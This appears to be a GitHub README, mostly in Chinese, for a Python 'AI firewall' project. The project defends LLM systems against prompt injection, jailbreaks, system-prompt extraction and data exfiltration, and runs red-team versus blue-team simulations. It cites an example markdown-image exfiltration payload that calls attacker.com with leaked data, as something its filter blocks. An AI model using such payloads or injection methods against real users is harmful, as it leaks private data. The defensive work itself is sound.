mulugumanishkumar2006-del/secure-ai-firewall-system

GitHub: mulugumanishkumar2006-del/secure-ai-firewall-system

一个生产级 AI 防火墙框架，通过多阶段安全网关为 LLM 系统提供提示词注入防御、PII 遮蔽、策略执行和红蓝队对抗测试。

Stars: 0 | Forks: 0

# 安全 AI 防火墙系统一个生产级、企业级、使用 Python 3.12 编写的**安全 AI 助手与防火墙系统**。该系统展示了高级的大型语言模型（LLM）安全技术、实时威胁检测、输出净化和安全的智能体工具执行，并专门针对 **OWASP Top 10 LLM 安全风险**进行映射和缓解。 ## 系统架构与纵深防御该架构通过多阶段安全网关拦截所有输入和输出： ``` [ User Prompt ] │ ▼ ┌─────────────────────────────────────────────────────────────────┐ │ 1. LLM GATEWAY (PRE-PROCESS) │ │ - PII Detection: Emails, Aadhaar, Credit Cards, Secrets │ │ - Prompt Injection Scanner: Keyword matching, Structural tags │ │ - Policy Engine: ALLOW/BLOCK category rules │ │ - Threat Classifier: Categorizes into SAFE/SUSPICIOUS/MALICIOUS│ └────────────────────────────────┬────────────────────────────────┘ │ [ Safe / Suspicious ] │ ▼ ┌─────────────────────────────────────────────────────────────────┐ │ 2. SECURE WRAPPED AGENT │ │ - XML tag framing & Sandwich prompt context shielding │ │ - Simulated vulnerable LLM (obeying jailbreaks if exposed) │ └────────────────────────────────┬────────────────────────────────┘ │ [ Optional Tool Call Signal ] │ ▼ ┌─────────────────────────────────────────────────────────────────┐ │ 3. SANDBOXED TOOL EXECUTOR │ │ - Strict CLI command injection regex checks │ │ - Directory containment checks (blocks path traversal) │ │ - Strict Allowed Tools whitelist policy │ └────────────────────────────────┬────────────────────────────────┘ │ [ Raw LLM Output ] │ ▼ ┌─────────────────────────────────────────────────────────────────┐ │ 4. GATEWAY FILTER (POST-PROCESS) │ │ - PII Leakage Check & Redaction │ │ - Exfiltration Block: Strip markdown images & external URLs │ │ - System Prompt Leakage Protection: Catch extraction attempts │ └────────────────────────────────┬────────────────────────────────┘ │ ▼ [ Sanitized Output ] ``` ### OWASP LLM Top 10 缓解措施 1. **LLM01：Prompt Injection**：通过在预处理器中进行关键字/结构/base64 检测，结合 XML 标签封装以及 Prompt Engine 中的三明治 Prompt 结构来进行防御。 2. **LLM02：不安全的输出处理**：通过运行 Response Filter，在渲染前对生成的脚本或 markdown 资源进行脱敏和限制，从而缓解此风险。 3. **LLM06：敏感数据活跃性（数据泄露）**：通过 Response Filter 阻止自动发起的外部请求（例如 markdown 图片像素 `![exfil](http://attacker.com/leak?data=...)`）来进行防御。 4. **LLM08：Excessive Agency**：通过将工具限制在明确的允许列表内、检查 shell 执行字符以及检查文件边界以防止目录遍历来缓解此风险。 ## 文件结构 ``` security-ai-system/ │ ├── config/ │ └── settings.py # Configuration thresholds and allowlists │ ├── core/ │ ├── prompt_engine.py # Sandbox prompt wraps (Sandwich prompt) │ ├── tool_executor.py # Sandboxed math, file, and weather tools │ ├── response_filter.py # Exfiltration and system prompt leak blockers │ └── llm_gateway.py # Core gateway manager & logger │ ├── security/ │ ├── pii_detector.py # Regex PII scanner (email, phone, cards, secrets) │ ├── prompt_injection_detector.py # Structural, base64 and keyword scanner │ ├── policy_engine.py # ALLOW/BLOCK rule evaluator │ ├── content_filter.py # Profanity and self-harm scanner │ └── threat_classifier.py # Aggregates scores into threat profile │ ├── agents/ │ ├── secure_agent.py # Stateful chatbot wrapper │ ├── red_team_agent.py # Adversarial attack simulator │ └── blue_team_agent.py # Log audit and auto-configuration agent │ ├── evaluations/ │ ├── jailbreak_tests.json # Test cases database (threats and benigns) │ ├── security_metrics.py # Calculations for KPI reporting │ └── attack_tests.py # Execution runner compiling compliance report │ ├── tests/ │ ├── test_injection.py # Pytest injection unit tests │ ├── test_pii_leakage.py # Pytest PII masking unit tests │ └── test_policy.py # Pytest policy engine unit tests │ ├── logs/ # Storage folder for audit and security logs ├── requirements.txt # Project dependencies ├── main.py # CLI console launcher └── README.md # Project documentation ``` ## 安装与设置 1. **前置条件**：确保已安装 Python 3.12+。 2. **安装依赖**： pip install -r requirements.txt ## 运行方式系统通过 `main.py` CLI 提供三种操作模式： ### 1. 交互式聊天控制台（实时防火墙日志）与安全聊天机器人进行实时对话。您将看到实时的日志详情、工具执行情况和威胁警报。 ``` python main.py --mode interactive ``` ### 2. 运行自动化评估套件（合规报告）针对包含 15 个对抗性和良性场景的测试数据库执行防火墙测试，在 `logs/security_report.md` 中生成合规报告，并记录汇总统计数据。 ``` python main.py --mode evaluate ``` ### 3. 红队 vs 蓝队攻击模拟模拟多智能体攻击场景：红队生成并向防火墙发起攻击，随后蓝队分析日志并提出改进策略的配置建议。 ``` python main.py --mode simulation ``` ### 4. 运行 Pytest 套件运行所有针对 prompt injection、PII 掩码和策略评估的单元测试： ``` pytest tests/ ```

标签：AI安全, Chat Copilot, DLL 劫持, LLM防火墙, Python, 大语言模型, 提示词注入防护, 文档结构分析, 无后门